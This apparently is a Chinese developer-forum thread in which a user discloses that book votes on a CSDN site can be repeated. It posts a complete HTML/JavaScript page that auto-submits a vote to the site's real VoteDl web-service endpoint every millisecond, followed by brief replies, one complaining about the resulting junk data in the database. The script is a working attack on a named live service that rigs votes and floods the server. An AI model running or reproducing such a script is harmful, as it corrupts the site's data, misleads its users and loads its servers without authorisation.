公开一个CSDN漏洞
发现关于http://book.csdn.net/下的一些投票都可以重复投
这个web service很特别
http://club.book.csdn.net/BookServer/bs.asmx
关于一个图书投票地址
http://club.book.csdn.net/people/mylist599.html
以下对上面地址刷票
<html>
<body onload= "Timer_submit() ">
<script>
function Timer_submit()
{
Submit();
window.setTimeout( "Timer_submit() ",1);
}
function InitDataWs()
{
if(window.XMLHttpRequest)
{
szRequest=new XMLHttpRequest();
szRequest.overrideMimeType( "text/xml ");
}
else
{
szRequest=new ActiveXObject( "Microsoft.XMLHTTP ");
}
szRequest.open( "POST ", "http://club.book.csdn.net/BookServer/bs.asmx/VoteDl ",true);
}
function Submit()
{
InitDataWs();
szRequest.setRequestHeader( "Content-Type ", "application/x-www-form-urlencoded ");
szRequest.send( "dlid=599&type=1 ");//dlid什么什么ID, type=0 代表没用,type=1 代表有用
szRequest=null;
}
</script>
</body>
</html>
或许这不算是个漏洞,大家看一下
[解决办法]
我说 怎么数据库中这么多垃圾数据
都是你这个烂人用这种烂方法 作的烂攻击
[解决办法]
厉害
[解决办法]
AJAX